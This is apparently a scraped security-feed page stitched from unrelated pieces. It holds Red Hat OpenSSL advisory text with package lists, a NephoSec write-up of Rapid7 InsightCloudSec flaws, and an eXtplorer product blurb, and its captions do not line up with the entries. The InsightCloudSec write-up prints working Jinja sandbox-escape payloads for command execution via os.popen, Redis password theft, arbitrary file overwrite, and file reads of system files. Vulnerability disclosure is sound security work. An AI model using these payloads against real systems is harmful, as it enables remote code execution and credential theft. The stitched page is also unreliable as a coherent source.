https://access.redhat.com/security/cve/CVE-2023-28162  
https://access.redhat.com/security/cve/CVE-2023-28164  
https://access.redhat.com/security/cve/CVE-2023-28176  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBh4dtzjgjWX9erEAQj81A//S6TInGACud9jWKSoJ4HAJyy2S8hpEbtK  
gCLwSk0UoRVJD9jSQu9pOBBVueCabQzeOEH3GLmHxyYdrGYnhZIxnmayn/Z704TT  
j1i5Pl+cecMUG/4gLsMbRQCB+n8wkfoWpkBK4Pk6FbyMX6ERoj2iEdFlFZ71FjyK  
LjnjiKSsMalugN3Aa0pn2WOrVWo6SLfXLkmdDc3PLtBRQsvIgrmnwOQBet7fDRlV  
dbCTfC7lRqriSZw1lvVWXWitoK0AJmhUlpLUGxXFftkCZ6hAeW23rsnsA/GwoDcT  
8phSbbkyLUu0MuPWP2KTad8dZh9MO82sIzOlZDiQac8LCv9V16k1DWDZSQV/tdFv  
rwWpv+HWGJ9uJSY0L5Tdi8KBrVlIVBDShV6p8mBHLoUcnVYhjfC6VLJ76aZDPHwb  
13mt56+xL5QTA28P+zIlp3ErYncYz4zxz0qtY4YFt5tq+JsPE+LQ36YoClDqY5A4  
8j1Uyvj0vTlXwWBns3KmpxgKOQ+V5aPh6tWH2gu/oTVB4qLcduJ8hf72gPLMCpZB  
7maVF1965oSDf1ee6BU2PRuBLWe15+jbb/CkKWKjiaOR7m1XcqHaRgQOGMOHezC0  
K3t6lwqw5OU5NCZyRdU5M6TRQoFYAHWWDC/9yhkkkZ4Q9V64kePEWQT/J+z3hFcq  
fGlU9/kXsOM=Go6C  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1333-01

Red Hat Security Advisory 2023-1335-01 - OpenSSL is a toolkit that implements the Secure Sockets Layer and Transport Layer Security protocols, as well as a full-strength general-purpose cryptography library.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: openssl security update  
Advisory ID:       RHSA-2023:1335-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1335  
Issue date:        2023-03-20  
CVE Names:         CVE-2023-0286  
====================================================================  
1. Summary:

An update for openssl is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and  
Transport Layer Security (TLS) protocols, as well as a full-strength  
general-purpose cryptography library.

Security Fix(es):

* openssl: X.400 address type confusion in X.509 GeneralName  
(CVE-2023-0286)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

For the update to take effect, all services linked to the OpenSSL library  
must be restarted, or the system rebooted.

5. Bugs fixed (https://bugzilla.redhat.com/):

2164440 - CVE-2023-0286 openssl: X.400 address type confusion in X.509 GeneralName

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
openssl-1.0.2k-26.el7_9.src.rpm

x86_64:  
openssl-1.0.2k-26.el7_9.x86_64.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.i686.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.x86_64.rpm  
openssl-libs-1.0.2k-26.el7_9.i686.rpm  
openssl-libs-1.0.2k-26.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
openssl-debuginfo-1.0.2k-26.el7_9.i686.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.x86_64.rpm  
openssl-devel-1.0.2k-26.el7_9.i686.rpm  
openssl-devel-1.0.2k-26.el7_9.x86_64.rpm  
openssl-perl-1.0.2k-26.el7_9.x86_64.rpm  
openssl-static-1.0.2k-26.el7_9.i686.rpm  
openssl-static-1.0.2k-26.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
openssl-1.0.2k-26.el7_9.src.rpm

x86_64:  
openssl-1.0.2k-26.el7_9.x86_64.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.i686.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.x86_64.rpm  
openssl-libs-1.0.2k-26.el7_9.i686.rpm  
openssl-libs-1.0.2k-26.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64:  
openssl-debuginfo-1.0.2k-26.el7_9.i686.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.x86_64.rpm  
openssl-devel-1.0.2k-26.el7_9.i686.rpm  
openssl-devel-1.0.2k-26.el7_9.x86_64.rpm  
openssl-perl-1.0.2k-26.el7_9.x86_64.rpm  
openssl-static-1.0.2k-26.el7_9.i686.rpm  
openssl-static-1.0.2k-26.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
openssl-1.0.2k-26.el7_9.src.rpm

ppc64:  
openssl-1.0.2k-26.el7_9.ppc64.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.ppc.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.ppc64.rpm  
openssl-devel-1.0.2k-26.el7_9.ppc.rpm  
openssl-devel-1.0.2k-26.el7_9.ppc64.rpm  
openssl-libs-1.0.2k-26.el7_9.ppc.rpm  
openssl-libs-1.0.2k-26.el7_9.ppc64.rpm

ppc64le:  
openssl-1.0.2k-26.el7_9.ppc64le.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.ppc64le.rpm  
openssl-devel-1.0.2k-26.el7_9.ppc64le.rpm  
openssl-libs-1.0.2k-26.el7_9.ppc64le.rpm

s390x:  
openssl-1.0.2k-26.el7_9.s390x.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.s390.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.s390x.rpm  
openssl-devel-1.0.2k-26.el7_9.s390.rpm  
openssl-devel-1.0.2k-26.el7_9.s390x.rpm  
openssl-libs-1.0.2k-26.el7_9.s390.rpm  
openssl-libs-1.0.2k-26.el7_9.s390x.rpm

x86_64:  
openssl-1.0.2k-26.el7_9.x86_64.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.i686.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.x86_64.rpm  
openssl-devel-1.0.2k-26.el7_9.i686.rpm  
openssl-devel-1.0.2k-26.el7_9.x86_64.rpm  
openssl-libs-1.0.2k-26.el7_9.i686.rpm  
openssl-libs-1.0.2k-26.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64:  
openssl-debuginfo-1.0.2k-26.el7_9.ppc.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.ppc64.rpm  
openssl-perl-1.0.2k-26.el7_9.ppc64.rpm  
openssl-static-1.0.2k-26.el7_9.ppc.rpm  
openssl-static-1.0.2k-26.el7_9.ppc64.rpm

ppc64le:  
openssl-debuginfo-1.0.2k-26.el7_9.ppc64le.rpm  
openssl-perl-1.0.2k-26.el7_9.ppc64le.rpm  
openssl-static-1.0.2k-26.el7_9.ppc64le.rpm

s390x:  
openssl-debuginfo-1.0.2k-26.el7_9.s390.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.s390x.rpm  
openssl-perl-1.0.2k-26.el7_9.s390x.rpm  
openssl-static-1.0.2k-26.el7_9.s390.rpm  
openssl-static-1.0.2k-26.el7_9.s390x.rpm

x86_64:  
openssl-debuginfo-1.0.2k-26.el7_9.i686.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.x86_64.rpm  
openssl-perl-1.0.2k-26.el7_9.x86_64.rpm  
openssl-static-1.0.2k-26.el7_9.i686.rpm  
openssl-static-1.0.2k-26.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
openssl-1.0.2k-26.el7_9.src.rpm

x86_64:  
openssl-1.0.2k-26.el7_9.x86_64.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.i686.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.x86_64.rpm  
openssl-devel-1.0.2k-26.el7_9.i686.rpm  
openssl-devel-1.0.2k-26.el7_9.x86_64.rpm  
openssl-libs-1.0.2k-26.el7_9.i686.rpm  
openssl-libs-1.0.2k-26.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
openssl-debuginfo-1.0.2k-26.el7_9.i686.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.x86_64.rpm  
openssl-perl-1.0.2k-26.el7_9.x86_64.rpm  
openssl-static-1.0.2k-26.el7_9.i686.rpm  
openssl-static-1.0.2k-26.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0286  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBh4dtzjgjWX9erEAQgXUA/8C3pn0SsQbBdhO20gpMoAy86c/lqv+iCz  
1NyIsfk6xTvXXoigT5Rsx0GJVSoh7ZcPTGgapkoQLBM4Wvv3bSJCPeDQLtp2Q+Me  
DSEm+QE8V8RghpoadjIWq98uk7Aw6zI71Cu7twHoDQH3uxCZ3Vzw2O8pLjroZifS  
/xWBC6R0Vn+HkMHsYYHqXVFpOwgTb3QWl8GJiXsM5TEpqO/CgWcZ9CHoQuKybV+o  
PbRYL8PgILj1NNDvaUK/WyQ9oCO++x1JCl4hWFs7FsyoBbQU6/JBCwTHNhVilykF  
E/KDXy1AUx0ry1ygy2t12D1NwOS/QIPvryvr8/SJ4Fo4iR2n+q1QU4Mnj1N16WCN  
bYm4pZlQsCJ9g+2qTBS32LS3ua3Glwfng4DkmJIkNGmJ4ixPKvut7MsnOSvMHaKj  
Wmxc/bCCNKg6Zlhz6RO2XmSNNc86u6Jkd3367QrkJYScUrvbKuj8w1acy+B5Cf9W  
dzKOEE73xC6n495NKe3pk3zHymu9eT4sOIhjQ/t4P6gwWEFmw1TLN65aNO8O8bfj  
T2HbLA0V81Xysq4WzlrWVR7uRYOyMlPbBjSa3g6MZv7BqB6/Eq9gqqCuNpsWSfyl  
x3oWlRhKb7LJnwYqRo9Lryoro/aUlmwJOmAa5yyb/GKNa3XkTrL8dw4BRsyU5NM6  
29sbSDI9Q+0=EWmC  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1335-01

An authenticated attacker can leverage an exposed resource.db() accessor method to smuggle Python method calls via a Jinja template, which can lead to code execution. This issue was resolved in the Managed and SaaS deployments on February 1, 2023, and in version 23.2.1 of the Self-Managed version of InsightCloudSec.

CVE-2023-1304  ◾  CVE-2023-1305   ◾  CVE-2023-1306

**Introduction**

InsightCloudSec (formerly DivvyCloud) is a fully-integrated cloud-native security platform (CNSP) that enables organizations to drive cloud security forward through continuous security & compliance. With InsightCloudSec, Rapid7 is the first organization to bring together a single solution that integrates posture management, identity & access management, infrastructure-as-code, and Kubernetes workload protection to enable teams to safely speed up their cloud adoption without compromise.

https://docs.divvycloud.com/docs

The InsightCloudSec/DivvyCloud (ICS) platform allows central management of cloud assets and resources across multiple cloud providers in a single, unified web interface.

ICS allows for the automation of inventory management tasks such as:

*   Compliance checks
*   Resource management
*   Auto-tagging

ICS allows for event-based action execution. For example, should an EC2 instance have a rule allowing RDP to be world-accessible, a user-built action will fire. These may include sending an email to a cloud security team, spinning down the instance, etc.

Automation of these tasks is done through “bots.”

**Exploitation**

**CVE-2023-1304**

Initial attack surface exploration of the bot framework showed that ICS allows for Jinja templating within the body of an email sent when the bot is triggered. The presence of Jinja templating was a thoroughly enticing opportunity for a deep dive into the application’s Jinja rendering configuration.

https://docs.divvycloud.com/docs/jinja2

The first step for exploration was to create a bot which could be triggered arbitrarily to render the Jinja template. This naturally requires the user to have privileges within the application to create or edit bots. with the following roles:

*   Bot creator
*   Bot editor

**Fig. 1. Creating the bot**

Once created, we assign a resource to monitor, and a filter which specifies the conditions for which the bot will execute:

**Fig. 2. Specifying the monitored resource type (Instance)**

**Fig. 3. Selecting the filter for the monitored resource type**

NephoSec selected the “Always Match” filter for ease of exploitation, allowing rapid triggering of the preceding action. NephoSec then chose the “Send Bulk Email” action to trigger when the filter condition is met:

**Fig. 4. Selecting the “Send Bulk Email” action**

**Fig. 5. Configuration of the “Send Bulk Email” action**

**Remote Code Execution**

NephoSec noted the “Preview Message” link sent the contents of the message to an API endpoint via POST request which rendered the provided email body (including Jinja templates). NephoSec leveraged BurpSuite to capture and modify the template rendering request:

**Fig. 6. Sending a template email to the Jinja mock endpoint**

**Fig. 7. Confirming Jinja template rendering**

Per ICS documentation the user may access the “resource” object within the templating to provide details about the impacted resource which may include resource type, public ip, associated tags, etc as can be seen in Figure 9:

**Fig. 8. Object disclosure when rendering “resource” object**

NephoSec attempted to test access to “sensitive” methods associated with an object such as “\_\_dir\_\_”, but found the Jinja rendering engine leveraged security sandboxing as seen in the following request:

**Fig. 9. Security error when accessing unsafe methods or members**

As the typical attack chain for Jinja was not feasible, NephoSec explored the available objects within the Instance class to aid in exploitation.

NephoSec identified the “db” member available to the Instance object by leveraging BurpSuite’s “Intruder”:

**Fig. 10. Intruder attack enumerating member variables of the Instance class**

**Fig. 11. Object disclosure of the “DivvyCloudGatewayORM” object**

Referring to the source code within the ICS container, NephoSec identified the DivvyCloudGatewayORM class exposed a method named “GetHighestNumberedOrganization” which returned an Organization

**Fig. 12, 13. DivvyCloudGatewayORM exposed functions**

The Organization class inherited from the “Base,” “AbstractListTable,” and “ResourceMixin” classes as can be seen in the source definition:

**Fig. 14. Definition of the Organization class**

By examining the AbstractListTable object, NephoSec found a method exposed by the AbstractListTable class named “access\_query\_column” with the following definition:

**Fig. 15. “access\_query\_column” exposing the “getattr” method**

By chaining the db member, the Organization class, and the AbstractMixinTable base class, NephoSec had the ability to invoke the stdlib “getattr” method, allowing access to “sensitive” methods like “\_\_dir\_\_” as can be seen in the following request:

**Fig. 16. Successful referencing of the dir method**

Using this prototype, NephoSec confirmed the ability to execute the built-in dir method against the resource.db object as seen in the following request:

**Fig. 17. Invoking built-in dir method against “resource.db” object**

Using this new gadget, NephoSec crafted a Jinja template to achieve remote code execution using the following logic:

1\. Use the dir gadget to access \_\_class\_\_ , \_\_mro\_\_ , and \_\_getattribute\_\_  
2\. Use \_\_getattribute\_\_ to reference \_\_subclasses\_\_  
3\. Use \_\_subclasses\_\_ to reference the “warncls” class  
4\. Use the system module within the “warncls” class to invoke os.system

NephoSec used the following payload to successfully invoke the command uname -a formatted without annoying padding, and shown in the request as seen in the following figures:

{% set a = resource.db.GetHighestNumberedOrganization().access\_query\_column %}
{% set \_getattr = a(None, '\_\_getattribute\_\_')\[1\] %}
{% set subclasses = \_getattr( \_getattr( \_getattr( (), '\_\_class\_\_' ), '\_\_base\_\_'),
'\_\_subclasses\_\_')() %} {% set warncls = subclasses\[115\] %}
{% set mod\_sys = \_getattr( \_getattr( warncls, '\_\_init\_\_'), '\_\_globals\_\_')\['sys'\] %}
{{ mod\_sys.modules\['os'\].popen('uname -a').read() }}

**Fig. 18. Jinja template (without padding for readability)**

**Fig. 19. Full payload for command execution (with padding for readability) executing uname -a**

This occurs due to the accessibility to the getattr() method allowing unconstrained access to private methods which were denied by the security sandbox.

In essence, the payload may be reduced to the following python code:

cls = ().\_\_class\_\_ # get a base class
base = cls.\_\_base\_\_ # reference base class
subclasses = base.\_\_subclasses\_\_ # reference subclasses list
warncls = subclasses\[115\] # reference the "warning" subclass which contains a path
to reach the sys module
mod\_sys = warncls.\_\_init\_\_.\_\_globals\_\_\['sys'\] # reference the sys module
mod\_sys.modules\['os'\].popen('uname -a').read() # invoke and read stdout from the
command "uname -a"
# akin to just running os.popen() ...

**Arbitrary Redis Command Execution**

**CVE-2023-1306**

NephoSec identified the following execution path to allow execution of Redis commands on the connected instance:

{{ resource.db.logger.root.handlers\[1\].redis }}

Provides the following available methods:

**Redis Password Retrieval**

Leveraging the getattr method, NephoSec identified a path to retrieve the cleartext password for the redis instance in use by ICS by executing the following payload:

{{ resource.db.logger.root.handlers\[1\].redis.connection\_pool.get\_connection(command\_name='').password }}

Confirmation can be seen in the following request (this instance has been decommissioned and the password is no longer valid):

**Arbitrary File Overwrite**

**CVE-2023-1305**

NephoSec identified the “Box” object referenced by “resource.ext” had the ability to read and write files as yaml and json. NephoSec used this class to write JSON to arbitrary files (that are writeable by the user) leveraging the following payload:

{{ resource.ext.from\_json( '{ \\"a\\" : 1 }' ).to\_json(filename='/tmp/test') }}
{# writing to file #}
{{ resource.ext.from\_json(filename='/tmp/test').to\_json() }}
{# reading the written contents #}

**Limited Arbitrary File Read**

NephoSec noted **extremely limited** arbitrary file read capabilities, as the target file on the host MUST be parseable by either the json or yaml parser provided by the Box object as seen in the following payload:

{{ resource.ext.from\_yaml(filename='/etc/group') }}

CVE-2023-1306: Exploiting Rapid7’s InsightCloudSec – NephōSec

Insecure Permissions vulnerability found in Extplorer File manager eXtplorer v.2.1.15 allows a remote attacker to execute arbitrary code via the index.php compenent

**eXtplorer is a php-based file manager**

**eXtplorer Features¶**

The Main Features of eXtplorer are:

*   **Copy & Move** Files and Directories by Drag&Drop
*   Dynamic Directory Tree with on-demand loading of subdirectories
*   **Edit** Files (with **Syntax-Highlighting** thanks to EditArea)
*   **Rename**, Delete or Create new Files and Directories
*   Access Files through ''FTP'' or directly (using PHP) to totally overcome _permission_ and _file ownership_ issues
*   **Upload** or Download files just as you like
*   Create and **Extract Archives** (ZIP, Tar, Tar/GZ, Tar/BZ)
*   **User Management** with different permission levels like "View only" or "Edit" and "Admin"

*   **Easy Install**:
    *   As a component for Joomla!.
    *   Upload the install file to your web host

All these features are packed into an intuitive Layout which makes working with files very easy. Thanks to the great ExtJS Javascript Library you can drag & drop folders and files, filter directories and sort the file list using various criteria.

Tag

#js